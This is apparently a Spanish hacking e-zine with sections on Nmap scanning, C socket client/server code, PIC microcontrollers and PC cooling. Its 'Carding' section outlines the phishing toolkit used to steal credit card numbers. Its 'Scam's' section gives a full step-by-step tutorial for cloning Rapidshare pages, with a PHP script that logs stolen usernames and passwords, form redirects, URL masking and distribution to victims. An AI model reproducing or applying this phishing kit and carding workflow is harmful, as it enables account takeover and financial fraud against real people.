sofware para escanear las redes. Ha sido utilizado para escanear grandes redes de cientos de miles de maquinas. Soporta docenas de tecnicas avanzadas de cartografia de las redes llenas de los filtros IP, firewalls, routers y otros obstaculos. Esto incluye muchos puertos mecanismos (tanto TCP y UDP), deteccion de SO, los barridos de ping, etc. * Windows o Linux? NMAP se ejecuta en todos los principales sistemas operativos, y ambas versiones de la consola y grafica estan disponibles. En un principio solo estaba disponible para Linux, pero luego salio la version para windows, aunque recomiendo utilizarlo en plataformas Linux. * Donde lo descargo? Su pagina oficial es http://www.insecure.org La ultima es la version 4.85 beta. Dentro de la web oficial, en esta pagina: http://nmap.org/download.html esta la version nmap disponible para todas las plataformas. 2 - Nmap Basico * Protocolos y NMAP NMAP escanea los siguientes 4 protocolos: IP - Internet Protocol TCP - Transmission Control Protocol UDP - User Datagram Protocol ICMP - Internet Control Message Protocol * Estado de puertos Los estados pueden ser: Open (abierto): Abierto significa que la aplicacion en la maquina destino se encuentra esperando conexiones en ese puerto. Filtered (filtrado): Un cortafuegos, filtro, u otro obstaculo en la red esta bloqueando el acceso a ese puerto. Unfiltered (no filtrado): Responden a los sondeos de Nmap, pero no puede determinar si se encuentran abiertos o cerrados. Closed (cerrado): No tienen ninguna aplicacion escuchando en los mismos. * Comandos basicos IP: TCP: UDP: TCP SYN: PING: S.O: D.Vers: -sO -sT -sU -sS -sP -O -sV * Escaneo simple * Escaneando puertos UDP * Escaneando TCP y UDP 3 - Tecnicas de Escaneo * Escanear rango de Ips nmap -sO 190.45.187.* ----> al cambiar por un ''*'', NMAP escaneara desde el 1 hasta el 255, es decir, desde la ip: 190.46.187.1 hasta 190.46.187.255 * Especificando puertos No solo se puede especificar un solo puerto, sino tambien mas de uno, por ejemplo: -p 80 -p 80,110,135,140-150,200 * Excluir targets Esta tecnica podriamos utilizarla cuando escaneamos un rango de IPs, evitar escanear cierta ip, por ejemplo: Como podemos ver en la imagen, NMAP empezo el escaneo desde la IP: 190.48.250.2 saltandose la 190.48.250.1 como le indique. * OS Fingerprint Operative System Fingerprint, esta tecnica sirve para saber detalles del sistema operativo de la pc escaneada, y no solo eso, tambien saber si hay una sesion abierta en esa pc. Ejemplo: Mas informacion en http//insecure.org/nmap/osdetect 4 - Conclusion *Extras Tabla para tener a mano: Nombre IP TCP TCP SYN UDP PING RPC OS Fingerprinting Detectar Version Especificar puertos Randomize host ACK Windows scan Modo verbose No excluir puertos Soporte Ipv6 Version NMAP Comando -sO -sT -sS -sU -sP -sR -O -sV -p -rH -sA -sW -v --allports -6 -V * Creditos Autora: V4NDID4 Contacto: ocxide@hotmail.com Web: http://www.xianur0.com Nota*: Algunos apuntes de este papper fueron extraidos de la web oficial del NMAP: www.insecure.org * Despedida En mi opinion NMAP es el mejor escaner, ya que, aparte de ser una magnifica herramienta de codigo abierto, escanea con una rapides y efectividad que no he visto en ninguna aplicacion similar. Cabe destacar que esta herramienta no se limita a lo visto en este manual, hay muchas mas tecnicas, mas secretos, hay mucho mas por descubrir. Espero que lo visto les sea de utilidad y puedan utilizar el NMAP, aunque sea en sus funciones mas sencillas. Gracias por leer. FIN Seccion Programacion By: [SeC] 0x01 ¿Qué es un socket? “Socket designa un concepto abstracto por el cual dos programas (posiblemente situados en computadoras distintas) pueden intercambiarse cualquier flujo de datos, generalmente de manera fiable y ordenada”. Un socket queda definido por una dirección IP, un protocolo de transporte y un número de puerto. Cita Textual de: Wikipedia Para entender mejor este concepto se suele utilizar la analogía con los teléfonos: “Los sockets permiten la comunicación entre procesos, como los teléfonos permiten la comunicación entre las personas”. 0x02 ¿Dominios de Comunicación y tipos de sockets? Los sockets se crean dentro de un dominio de comunicación, esto nos dice donde se encuentran los procesos que se van a intercomunicar en esta conexión. Dominios de comunicación: AF_UNIX: Si los procesos están en el mismo sistema. AF_INET : Si los procesos están en distintos sistemas, unidos mediante una red TCP/IP. Nota Importante: existen otros dominios de comunicación, pero en este artículo solo trataremos el dominio AF_INET. Tipos de sockets AF_INET: •Sockets Stream (Los que trataremos). •Sockets Datagram. •Sockets Raw. Sockets Stream : Son los más utilizados, su flujo de datos es bidireccional, sin duplicación de paquetes y libre de errores, utiliza el protocolo TCP. Sockets Datagram : Hacen uso del protocolo UDP, por lo tanto su flujo de datos es bidireccional, pero los paquetes pueden llegar fuera de secuencia, pueden no llegar o contener errores. Sockets raw : Todos los lenguaje de Programación como mínimo ofrecen la posibilidad de utilizar sockets TCP y UDP. Pero cuando deseamos disponer de un acceso total al sistema de red, no hay otro remedio que acceder a la API de red con un lenguaje como C. Este acceso permite cosas como enviar paquetes ICMP, ARP, o cualquier otro totalmente personalizado, modificando cualquier flag o dato de la cabecera. Incluso, si lo deseamos, podemos crear nuestro propio protocolo, esto solo es posible mediante sockets RAW. 0x03 ¿Funciones, estructuras y primera aproximación? •Estructura Sockaddr_in struct sockaddr_in { short int sin_family; // familia de direcciones, AF_INET unsigned short int sin_port; // Número de puerto struct in_addr sin_addr; // Dirección de Internet unsigned char sin_zero[8]; // Relleno para preservar el tamaño original de struct sockaddr }; No daré explicaciones profundas sobre esta estructura, solo mencionar que esta nace como una estructura paralela a sockaddr, con el fin de hacer mas fácil el manejo de la las direcciones de internet y sin_zero, se usa para no alterar el contenido que se debe respetar según sockaddr. Para leer mas sobre esto les recomiendo leer esto. •Estructura hostent struct hostent { char *h_name; char **h_aliases; int h_addrtype; int h_length; char **h_addr_list; }; h_name : Nombre oficial de la máquina. h_aliases : Un vector [array] terminado en NULL de nombres alternativos de máquina. h_addrtype : Tipo de la dirección que se devuelve; usualmente AF_INET. h_length : La longitud de la dirección en bytes. h_addr_list : Un vector terminado en cero de direcciones de red de la máquina. Las direcciones siguen la Ordenación de bytes de la red. h_addr : La primera dirección de h_addr_list. •Funcion gethostbyname() La funcion gethostbyname() devuelve un puntero a la estructura struct hostent que se ha llenado, o NULL en caso de error. Uso: struct hostent *host; host=gethostbyname(“localhost”); •Función Socket() Para explicar la función socket() supondremos el siguiente código: int sock; sock = socket(AF_INET,SOCKET_STREAM ,0); La llamada a socket(), nos devuelve un int , sock en este caso(descriptor de socket) que utilizaremos para conectarnos, enviar/recibir datos, aceptar conexiones, etc. Su signatura es la siguiente: int socket(int Dominio,int Tipo,int Protocolo); Dominio : Dominio donde se realiza la conexión. Tipo : Podrá ser SOCK_STREAM o SOCK_DGRAM o SOCK_RAW. Protocolo : 0 (cero, selecciona el protocolo más apropiado en función del tipo ). •Función bind() int bind(int sock, struct sockaddr *my_addr, int addrlen); sock : Es el descriptor de socket devuelto por la función socket() visto mas arriba. my_addr : Es un puntero a una estuctura sockaddr que contiene la IP del host local y el número de puerto que se va a asignar al socket. addrlen : Debe ser establecido al tamaño de la estuctura sockaddr. sizeof(struct sockaddr). •Función connect() int connect(int sock, struct sockaddr *serv_addr, int addrlen); sock es nuestro descriptor socket, el que nos lo devolvió nuestra llamada a socket(), serv_addr es una estructura struct sockaddr que contiene el puerto y la dirección IP de destino, y a addrlen le podemos asignar el valor sizeof(struct sockaddr). struct sockaddr_in dest_addr; connect(sock,(struct sockaddr *)&dest_addr,sizeof(struct sockaddr)); Como dest_addr no es una estructura del tipo sockaddr, se realiza la conversión. •Función inet_addr() Supongamos una estructura struct sockaddr_in dir, vamos a guardar en ella la dirección IP "200.12.1115.49". La función que usaremos es inet_addr(), de la siguiente forma: direc.sin_addr.s_addr = inet_addr("200.12.1115.49"); Ahora veamos como Asignar valores a una variable tipo sockaddr_in, miremos el siguiente ejemplo: struct sockaddr_in datos_addr; datos_addr.sin_family = AF_INET; datos_addr.sin port = htons(3490); //Puerto escucha del server. datos_addr.sin_addr.s_addr = inet_addr(\"132.241.5.10\"); // La dirección IP por donde escuchara el servidor. memset(direc.sin_zero,0,8); // Relleno con ceros. •Función listen() int listen(int sock, int backlog); Nuevamente sock es nuestro descriptor socket backlog es el número de conexiones permitidas en la cola de entrada. Las conexiones esperaran en cola hasta que sean aceptadas “accept()”. •Función accept () int accept(int sock, void *addr, int *addrlen); sock : Descriptor de socket. addr : Puntero a una estructura sockadd_in. Almacenara la información de la conexión entrante (que host está llamando y desde qué número de puerto). addrlen : Debe ser establecido al tamaño de la estuctura sockaddr. Explicacion: Cuando alguien intente conectar “connect()” con tu máquina en un puerto en el que tú estás escuchando “listen()”. Esa conexión pasara a la cosa, esperando a ser aceptada “accept()”. Cuando llamas a accept()aceptaras una de las conexiones en espera, además “accept()” te devolverá un descriptor de socket completamente nuevo para que lo uses en esta nueva conexión (ya veremos send(), recv(), etc). •Función send () int send(int sock, const void *msg, int len, int flags); sock: Descriptor de nuestro socket. msg: Mensaje a enviar. len: Loguitud en bytes de nuestro mensaje a enviar. flags: Se deja en 0 para opciones por defecto. send() devuelve el múmero de bytes que se enviaron, puede que la llamada a send devuelva menos bytes de los que pidas que se envien, en este caso es simplemente porque no es posible enviar tantos datos, por lo que dependera del programador enviar el resto (es aconsejable comprobar esto en los programas). •Función recv() int recv(int sock, void *buf, int len, unsigned int flags); sock: Descriptor de nuestro socket. buf: es el buffer donde se guardara la información recibida. len: Es la loguitud maxima del buffer flags: Se deja en 0 para opciones por defecto. 0x04 Programación Cliente – Servidor Prácticamente todo en la red se trata siguiendo el modelo Cliente – Servidor, siempre habrá un cliente realizando una consulta y un servidor esperando de ella para dar su respuesta. Ahora y para terminar veremos unos ejemplos de programación cliente servidor usando toda la teoría de sockets vista hasta ahora. Cliente.c #include <stdio.h> #include <winsock2.h> int main(void) { WSADATA wsa; int sock; struct hostent *host; struct sockaddr_in direc; int conex; char buff[1024]; //Libreria estandar de entrada y salida //Libreria para el manejo de sockets en windows // Variable de inicializacion necesaria en windows // Descriptor de socket WSAStartup(MAKEWORD(2,2),&wsa); //Inicializamos (necesario en windows) host=gethostbyname("localhost"); //Resolvemos localhost a 127.0.0.1 //creamos el socket, indicando la familia el tipo y el protocolo a usar sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if (sock==-1) { printf("Error al crear el socket\n"); return -1; } //Llenamos nuestra estructura direc, e indicamos el puerto a conectar direc.sin_family=AF_INET; direc.sin_port=htons(777); direc.sin_addr = *((struct in_addr *)host->h_addr); memset(direc.sin_zero,0,8); //Intentamos establecer la conexión conex=connect(sock, (struct sockaddr *)&direc,sizeof(struct sockaddr)); if (conex==-1) //posibles razones para que no se realize la conexion: 1- Host no encontrado { // 2- Puerto Cerrado printf("No se ha podido conectar\n"); return -1; } fprintf(stdout,"[=======================================]\n"); fprintf(stdout,"[=] Pequeño cliente de mensajes [=]\n"); fprintf(stdout,"[=] By S[e]C [=]\n"); fprintf(stdout,"[=======================================]\n\n"); while (strcmp(buff,"quit")!=0) //Mientras no se envie el comando quit { fprintf(stdout,"Mensaje\t:"); //Leimos el mensaje a enviar fscanf(stdin,"%s",buff); //lo almacenamos en buff send(sock,buff,strlen(buff),0); // y lo enviamos } return 0; } Servidor.c #include <winsock2.h> #include <stdio.h> int main(void) { WSADATA wsa; int sock; struct sockaddr_in local; char buff[1024]; int len; //Libreria para el manejo de sockets en windows //Libreria para el manejo de sockets en windows // Variable de inicializacion necesaria en windows // Descriptor de socket // Estructura para la informacion de la maquina local WSAStartup(MAKEWORD(2,0),&wsa); //Inicializamos sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); //Creamos el socket if (sock==-1) //comprobamos que todo resulte bien { printf("Error al crear el socket\n"); return -1; } //Llenamos la estructura con la informacion de nuestra maquina //y establecemos el puerto al que conectaremos local.sin_family = AF_INET; local.sin_addr.s_addr = INADDR_ANY; local.sin_port = htons(777); //Asociamos nuestro socket al puerto especificado al llenar la estructura local if (bind(sock, (SOCKADDR*) &local, sizeof(local))==-1) { printf("error en el bind\n"); return -1; } //Ponemos el socket a la escucha en el puerto if (listen(sock,1)==-1) { printf("error en el listen\n"); return -1; } len=sizeof(struct sockaddr); //Aceptamos una posible conexion entrante sock=accept(sock,(struct sockaddr*)&local,&len); fprintf(stdout,"[=======================================]\n"); fprintf(stdout,"[=] Pequeño Servidor de mensajes [=]\n"); fprintf(stdout,"[=] By S[e]C [=]\n"); fprintf(stdout,"[=======================================]\n\n"); while (len!=0) //mientras la conexión este establecida { len=recv(sock,buff,1023,0); //recibimos los datos if (len>0) //si quedan datos por recibir { printf("Mensaje Recibido\t:%s\n",buff); //Los mostramos } } return 0; } FIN Seccion Carding By: ic4r0z Primeros pasos sobre el Carding: Primero que nada, no muchos o realmente los que no conocen de esto pues no tienen ni la menor idea de lo que significa Carding, no lo que esto relaciona y encierra, así que definamos primeramente como es visto el Carding. Carding: Arte relacionada con el mundo Underground mediante la cual se utilizan ilegalmente números de tarjetas de crédito, con el fin de beneficiarse económicamente, sea bien traspasando dinero directamente, sea también realizando compras que serán cargadas a la tarjeta de la víctima. Lo cierto es que, el carding se lleva de la mano con el Phishing, lo cual es necesario que sepamos lo que es, para poder aplicar el carding. Muchas personas piensan que el carding es solo tomar una tarjeta de crédito y utilizarla como sea. La verdad es que parecería así de sencillo, sin embargo, todo tiene su proceso, necesitamos una serie de pasos para poder conseguir una Tarjeta de Crédito para seguidamente poder realizar una compra, esto no finaliza con realizar la compra, sino que, finaliza hasta el momento en el que usamos Ingeniería Social, para poder llevar la compra a un estado satisfactorio y exitoso. Por ahora nos enfocaremos a lo que Phishing se refiere: Es un término informático que denomina un tipo de delito encuadrado dentro del ámbito de las estafas, y que se comete mediante el uso de un tipo de ingeniería social caracterizado por intentar adquirir información confidencial de forma fraudulenta (como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra información bancaria). El estafador, conocido como phisher, se hace pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo común un correo electrónico, o algún sistema de mensajería instantánea o incluso utilizando también llamadas telefónicas. Después de conocer un poco sobre las definiciones y lo que conlleva esto, es importante mencionar que por tan fácil que sea o parezca, no significa que sea lo correcto, sin embargo, tu lector, al llegar a estas líneas, si aun estas interesado en entrar en este mundo del “Carding” es demasiado importante que tengas en cuenta los riesgos que corres y los “Castigos” que podrás recibir al realizar esta actividad. Simplemente podrías ser enviado a prisión y tu condena minima seria una multa, a partir de eso podrías recibir una condena minima de 5 años de prisión, esto es siendo lo MINIMO por lo cual es si tienes demasiada suerte, sino, para que te cuento. Llegando hasta este apartado quiero creer que haz acatado lo escrito en el párrafo de arriba, así que me dispondré en este primer articulo a mencionarte las “Herramientas” básicas que necesitaras para poder aplicar un buen Phishing, y seguidamente comenzaras a sacar algunas tarjetas de crédito. Herramientas para Phishing: • • • • • Hacked Host Scam Mail List Mailer Letter Estas cuatro herramientas son básicas, por lo cual me dispondré a explicar cada una para aquellos que no tendrán idea sobre algunas cosas. Hacked Host: Nos referimos a un “Hacked Host” a cualquier Página en la cual tengamos acceso, sin que el dueño de dicha Página Web sepa de nuestra intrusión, para ello necesitamos tener una Shell Up en la Web. Scam: Hablamos de Scam cuando nos referimos a una Página Web falsificada con el fin de conseguir datos ajenos con dicha Web. Existe una gran variedad de estos scams, la mayoría los personaliza para poder recibir los datos deseados. Los scams más comunes son los relacionados con las diferentes telefonías celulares (Telcel, MoviStar, etc.). Mail List: Esto no es nada mas que un compilado pequeño o enorme de E-Mails las cuales serán las victimas. Esto puede variar dependiendo del país a atacar. Mailer: Herramienta de las mas valiosas en esta actividad, ya que esta nos permitirá mandar E-Mails masivos a nuestras victimas con la información que nosotros queremos que vea (Letter) para que con esto, acceda a nuestro scam. Letter: Es una pequeña “carta” la cual contiene información escrita y/o con imágenes relacionada con la Empresa y/o Negocio por el cual nos hacemos pasar. Estas cuatro herramientas llevan un orden de uso, el cual sabremos en la siguiente guía, hasta aquí, creo que los que no sabían nada sobre esto, ya tendrán un poco mas de conocimiento, y lo que es mas importante es que, se darán cuenta de que no es tan fácil como se piensa ya que es necesario tener conocimientos de otras áreas para poder conseguir las demás herramientas que se necesitan para poder complementar. Para finalizar esto yo llegaría a la conclusión que para poder realizar un buen Phishing, es necesario saber aunque sea lo mínimo, y cuando digo lo mínimo, me refiero a un poco mas del mínimo jaja sobre estos temas. Defacing > Hacked Host Programación [PHP] como mínimo > Scam Diseño Gráfico > Letter Espero esta pequeña guía les haya sido de utilidad así como también espero lean la segunda parte, la cual llevara un poco mas de “practicas”, por el momento hasta aquí llegamos. ic4rOz! Greetz: Zer0 z0orG ; Gothic-X ; pRimO! ; kfOO ; Fre$no ; X0pt1k ; PoiSoN_San ; Ru$$h ; Inyexion ; Ru$$h ; xer0_Style ; komtec1 ; Em3trix ; #RE & DDLR Users. FIN Seccion Hardware By: Satyricon Introduccion al Mundo de los PIC’s Muchas personas quizás desconocen que es un PIC, pero debo de decirles que están tan emparentados como yo, aunque no lo sepan. Durante el transcurso de cada día, nos topamos a cada instante con algún tipo de PIC. Como por ejemplo, al subirnos al auto, su velocímetro, marcador de temperatura, nivel de combustible, etc, son PIC’s diseñados para cumplir esa función; al ir por la calle, un semáforo, es un simple PIC, el cual dada su programación, cumple el trabajo de emitir luces, cumplir la pausa antes de cambiar de posición, etc; al sentarnos en el sofá, a ver TV con su control remoto, el cual también es un PIC; y así se puede seguir nombrando infinidad de cosas que tienen un PIC programado para determinada función. Es por esto, que me pareció una buena idea, darles un pequeño pantallazo de cómo es un PIC, que tipos hay, como programarlas, etc, para así también, hacerles saber que “El mundo es llevado por un pedazo de código metido dentro de un Microcontrolador”. ¿Que es un PIC? Circuitos Integrados Programables (Programmable Integrated Circuits = PIC): Como su buen nombre lo dice, los PIC’s son Circuitos al cual se los puede programar para nosotros hacer que cumpla determinada función. Los Microcontroladores PIC’s, son procesadores similares a los usados en el mundo de la computación, siempre del tipo Von Neumann. Cabe recalcar, que al hablar de Microcontroladores y Microprocesadores, no nos referimos a la misma cosa, ya que un Microcontrolador esta compuesto en su interior por un Microprocesador más una serie de elementos que lo hacen actuar como un pequeño chip de computadora. Un Microcontrolador integra el CPU (Central Processor Unit) junto con todos los periféricos dentro de un mismo Chip programado. Al realizar su programación, hay que descuidarse de la cantidad de dispositivos, y solo concentrarse en que función tendrá el PIC, para así programar su funcionamiento. Es por esto, que este, usa la mayor cantidad de tiempo en enviar y recibir datos, que en trabajarlo. Los PIC’s de llevan por dos tipos de instrucciones: *- RISC (Reduced Instruction Set Computer): Instrucciones que solo necesitan un pulso de clock para ejecutarse. *- CISC (Complex Instruction Set Computer): Se logran instrucciones más poderosas pero a cambio necesitan varios ciclos de clock. Para manejarnos mejor en la práctica, a los microcontroladores los llamaremos bloques con memoria programada, lugar donde se guarda la información que determina que función debe cumplir; una memoria de datos donde ingresen las señales que debe procesar el programa; una unida aritmética y lógica donde se desarrollen todas las tareas; una unidad de control que se encargue de supervisar todos los procesos y puertos de entrada y salida para que el PIC tenga contacto con el exterior. Sistema de Mercado de PIC’s. Como elegir bien lo que necesitamos Existe una gran variedad entre los microcontroladores, pero quizás una de las más destacadas es su clasificación de cantidad de Bits (4, 8, 16 o 32). Aunque las características de los microcontroladores de 16 y 32 bits son superiores a los de 4 y 8, esto no quiere decir que sean los líderes del mercado. ¿Por qué? Por el simple echo de porque gastar en algo que nunca vas a usar por completo, seria algo absurdo, para eso comprar algo que nos sea necesario simplemente para lo que deseamos realizar y un precio muchísimo mas barato (simple sentido común). Espero se haya entendido lo que intente explicar. A la hora de elegir bien lo que necesitamos, hay varios puntos a tener en cuenta, el cual describiremos a continuación. Costo: Siempre es y será el principal de los temas a tratar a la hora de comprar. Existen competencias muy reñidas entre las empresas desarrolladoras de microcontroladores, es por esto que siempre varía su calidad y los recursos con los que fueron de armados. Antes de seleccionar el microcontrolador, es esencial saber los requisitos que solicita cada uno: Procesador de Datos: Es necesario saber si requerimos de un microcontrolador que realice cálculos en un tiempo determinado, es ahí en donde debemos saber si necesitamos un PIC de 16 o 32 bits, para mayores exigencias, o simplemente de 4 o 8 bits para menores exigencias. Entrada y Salida: Para saber esto, es necesario saber que tipo de hardware manejaremos, para así interpretar la cantidad de salida y entrada que necesitaremos. Consumo: Este es un tema fundamental a la hora de un proyecto finalizado, ya que si el consumo es superior a lo que estamos recibiendo, tendremos más que un problema, un horror. Es por esto, que hay que elegir bien el microcontrolador que usaremos, para luego interpretar que cantidad de energía enviar al dispositivo habilitados. Memoria: para detectar las necesidades de memoria de nuestra aplicación debemos separarla en memoria volátil (RAM), memoria no volátil (ROM, EPROM, etc.) y memoria no volátil modificable (EEPROM). Este último tipo de memoria puede ser útil para incluir información específica de la aplicación como un número de serie o parámetros de calibración. El tipo de memoria a emplear vendrá determinado por el volumen de ventas previsto del producto: de menor a mayor volumen será conveniente emplear EPROM, OTP y ROM. En cuanto a la cantidad de memoria necesaria puede ser imprescindible realizar una versión preliminar, aunque sea en pseudo-código, de la aplicación y a partir de ella hacer una estimación de cuánta memoria volátil y no volátil es necesaria y si es conveniente disponer de memoria no volátil modificable. FIN Seccion Scam's By: Satyricon & Lessiem Este tutorial esta exclusivamente realizado con fines didacticos y con el unico objetivo de ampliar conocimientos en la materia. Los autores se eximen de cualquier responsabilidad, daño o perjuicio causados por el mal manejo de este tutorial. Esta excelente guía/tutorial les enseñara la manera correcta de crear sus propios scams para robar las tan preciadas cuentas de Rapidshare. Lo primero que necesitamos es buscar un link verdadero de un archivo subido a Rapidshare. En mi casa elegí este, el del LimeWire Pro 5.1.1 cuyo link de descarga es http://rapidshare.com/files/205031119/LimeWireWin.exe Nota: Siempre tengan en cuenta de que para que funcione bien un Scam, este tiene que poseer información el cual pueda descargar mucha gente, en mi casa elegí ese porque es la ultima versión de ese programa P2P. Una vez que tenemos el link que usaremos para el Scam, debemos de ingresar, esperar a que cargue por completo, e ir a Archivo/Guardar Como… o Ctrl + S. El nombre que le pondremos sera “index.html” Sin las comillas y lo pondremos adentro de una carpeta. Una vez que guardamos, vamos al link original y apretamos en Premium User. Cuando nos termine de cargar, hacemos lo mismo que con el index.html, pero en este caso guardaremos como “premium.html” sin las comillas. Si quieren conseguir algo mas que real, les recomiendo se consigan una cuenta Premium de rapidshare para realizar la siguiente accion. Lo que debemos hacer es logear una cuenta de rapidshare sobre el link original para que nos mande a una web el cual nos genera un boton de descarga del archivo. Logeamos y apretamos en Login. Nos abrira una nueva web, el cual la guardaremos como a las otras con el nombre “zone.html” sin las comillas. Una vez que guardamos las 3 páginas que necesitamos para nuestro scam, nos encargaremos de conseguir un host para poder montar el scam. Yo utilice Webcindario, pero pueden utilizar el que quieran, pero deben de tener en cuenta que el host tiene que aceptar PHP, y que no tenga problemas con el Phishing. Webcindario no me ha dado problemas, por eso utilizare ese. Bueno, ya estamos listos para empezar con lo interesante de todo esto, editar el código para que nos funcione a la perfección nuestro engaño a rapidshare. Bueno, nos dirigimos a la carpeta en donde guardamos los HTML. Tomamos index.html y le damos click derecho/abrir con el block de notas (pueden utilizar el editor que quieran, pero utilizare este porque se que todos los usuarios de Windows lo poseen). Una vez que nos lo abre nos vamos mas o menos a la mitad del código fuente hasta una parte que se presenta el siguiente código: <td style="text-align: center;" width="300"> <form action="http://rs418.rapidshare.com/files/205031119/LimeWireWin.exe" method="post"> <input name="dl.start" value="PREMIUM" type="hidden"> <img src="index_files/dl_schnell.gif"> <br> <input value="Premium user" type="submit"> </form> </td> Nota: Posiblemente cometan un error aca, pero revisen bien que esten parados en esa linea de codigo, ya que arriba de donde nos debemos parar, esta un codigo similar, pero, para que se den cuenta rapido, el codigo de arriba es: <input name="dl.start" value="Free" type="hidden"> y el que tienen que buscar es: <input name="dl.start" value="PREMIUM" type="hidden"> Lo que debemos hacer aquí, es darle enlace a la página Premium.html que guardamos, para que una vez que nuestra victima aprete en Premium User, lo mande a la pagina que guardamos, y no a la de Rapidshare: Así esta: <form action="http://rs418.rapidshare.com/files/205031119/LimeWireWin.exe" method="post"> Así tiene que quedar: <form action="premium.html" method="post"> Una vez que hicimos ese cambio, nos vamos a Archivo/guardar o Ctrl + G. Bueno, ya tenemos preparado el index.html. Lo que debemos hacer a continuacion es abrir un nuevo documento con el block de notas, copiaremos y pegaremos el siguiente codigo: <?php header('Location:zone.html'); $user=$_POST['accountid']; $password=$_POST['password']; $guarda=fopen("logs.txt",a); fwrite($guarda," ~CuentaRapidshare~ User:".$user." Password:".$password); fclose($guarda); ?> Nota: Lo que haria este PHP seria guardarnos los datos que ingresemos en user y password en un archivo llamado logs.txt, para luego redireccionarnos a una web llamada zone.html. Ahora nos vamos a Archivo/Guardar Como, le ponemos de nombre "roba.php" sin las comillas y lo guardamos en la carpeta donde tenemos el index.html, premium.html y el zone.html. Listo, ya estamos mas o menos por la mitad de esta Guia/Tutorial. Ahora nos dirigimos a la carpeta donde estamos guardando todo, y le hacemos click derecho/abrir con el block de notas al "premium.html". Buscaremos la siguiente linea de codigo, que ahora se encuentra al final del codigo fuente: <p></p><form action="/cgi-bin/premium.cgi" method="post"><input name="premiumlogin" value="1" type="hidden"> <input name="fileid" value="205031119" type="hidden"><input name="filename" value="LimeWireWin.exe" type="hidden"> <input name="serverid" value="418" type="hidden"><table border="0" cellpadding="3" cellspacing="0"> <tbody><tr><td><b>Login:</b></td><td><input name="accountid" type="text"></td></tr> <tr><td><b>Password:</b></td><td><input style="font-weight: 500; font-style: normal; color: rgb(0, 0, 0);" name="password" type="password"></td></tr> <tr><td colspan="2" align="center"><input value="Login" type="submit"></td></tr></tbody></table></form> Una vez que estamos aca, debemos de editar en la primera linea, el cual debemos de cambiar el "form action" para que nos redireccione a nuestro "roba.php": Asi esta: <p></p><form action="/cgi-bin/premium.cgi" Asi tiene que quedar: <p></p><form action="roba.php" Lo ultimo que nos falta es abrir un nuevo documento en el block de notas y guardarlo vacio en la carpeta donde estas dejando todo con el nombre "logs.txt", que es aqui donde se almacenaran las cuentas robadas con el Scam. Bien, ya tenemos todo listo, lo unico que queda por hacer es subir nuestra carpeta al Host que utilizaremos para el scam. Yo utilice FlashFXP para subir los archivos la FTP del Host, pero pueden usar el que quieran. No explicare como realizar la accion de subir los archivos al Host, si tienen dudas busquen en el Foro. La URL para entrar al index.html, seria en mi caso, http://satless.webcindario.com/satless/index.html Pero que pasaria si por ahi andamos posteando que el link de descarga de una archivo subido a rapidshare, se baja desde Webcindario, cualquier persona se daria cuenta que algo raro se trae, y nadie descargaria. Para solucionar ese tema, nos ayudaremos de una web que protege links de rapidshare, pero tambien en su defecto, protegera nuestro scam, ocultando la verdadera URL. Esta web se llama http://lix.in/ Simplemente lo que debemos hacer es ingresar el link de nuetro index.html, para que nos genere un link protegido y que oculte nuestra URL. Deben apretar en Protect Link, y les generara el enlace. El link que me genero es http://lix.in/-3cf993, el cual usaremos para repartir nuestro scam. Ya hemos terminado con nuestra guia, lo unico que les queda por hacer es repartir post con el enlace de descarga de nuestro scam, para que puedan conseguir sus propias cuentas. FIN Seccion Hardware By: Satyricon Metodos de Refrigeracion Muchos no sabemos que en muchos de los casos, el exceso de calor en los microprocesadores es sinónimo de lentitud y problemas. Esto se debe, a que los microprocesadores, alcanzan muy altas temperaturas en uso, el cual, si no son refrigerados correctamente, estos debilitaran su funcionamiento, y nosotros lo notaremos al querer trabajar en el S.O. Es por esto, que siempre es interesante saber los métodos de enfriamiento que existen actualmente, como utilizarlos, cuando usarlos, y como saber si nuestra PC, se encuentra con una buena refrigeración para prevenir posibles problemas de lentitud debido al calor. Refrigeración por Aire: Creo que el 90 % del planeta sabe que una buena técnica de enfriamiento es por aire. Pero no muchos saben que usar un cooler no es el único método, es por eso, que describiré los distintos tipos que hay. Refrigeración por cooler (Ventilador): El método más viejo conocido sobre la tierra y uno de los más usados. El método es muy simple. Consiste en llevar aire de temperatura ambiente a un lugar especifico que deseamos refrigerar (generalmente de temperatura mas alta). En si, el método solo se basa por la física, ya que al realizar el envío de aire por medio de la velocidad de un motor, este, el aire, deja de estar en reposo y toma la velocidad empleada sobre el, dando como resultado, un descenso de temperatura del aire, el tan llamado aire fresco. Un simple pero efectivo método, aunque no siempre es suficiente. Refrigeración pasiva (Disipadores de calor): En que consiste esto, muy simple. Se utilizan materiales capases de disipar el calor, como por ejemplo el aluminio o cobre, y mucho mejor aun, la plata. Su funcionamiento es muy ingenioso, ya que toma de la superficie del microprocesador su alta temperatura, la reparte en el material disipable utilizado (mientras mas grande mejor, ya que tendrá muchísimo mejor circulación). Refrigeración activa (Acelerador de flujo de Aire): Es un método sumamente efectible, ya que utiliza el mismo método que la activa, pero sumándole un acelerador de flujo, generalmente un cooler. Su forma es muy variada, pero su método sigue siendo el mismo (mejor o no tanto). Seguimos constando de un disipador de alguna aleación de metal capas de disipar bien el calor, con una forma especifica, que esto aria que al entrar el aire fresco por el movimiento de las aletas del cooler, este, tomara aun mas velocidad, ocasionando una mejor refrigeración de las partes, y enviando el aire cambiado lejos de los componentes generadores de calor. Si bien su funcionamiento consta de un cooler, esto no quiere decir que será igual que silencioso que el método pasivo, es por esto que a algunas personas no les interesa, ya que prefieren la tranquilidad antes que la calidad, cosa que no acepto. También hay que tener en cuenta que su constectura es mayor, y es por eso, que se necesita un buen espacio para hacerlo funcionar, pero mientras se lo tenga, siempre es sugerible tener este tipo de refrigeración en nuestro hardware. Refrigeración por división: Este método es similar a la refrigeración pasiva, pero con un pequeño cambio, solo usaremos una pequeña plancha del derivado de la unión entre Seleniuro de Antimonio y Telururo de bismuto como método de separación entre el cooler y el hardware generador de calor, y un cooler como ayuda de enfriamiento. Podemos tomar el mecanismo similar al de las juntas usadas en las partes de automóviles, solo con el cambio de que no lo usamos como mecanismo de unión, sino de disipador. Esta variación de metales genera un incremento de baja temperatura, que con la ayuda de una simple cooler, mejora aun mas, dando como resultado, una buena disipación del calor y modo de enfriamiento. Refrigeración Liquida: Watercooling: Si bien es un método súper complejo de realizar, este quizás es uno de los más eficientes para PCs hogareñas. El agua tiene la facultad de poder conducir calor dentro de ella, entonces, al hacer un sistema de bombeo que envié agua a los componentes que deriven calor, 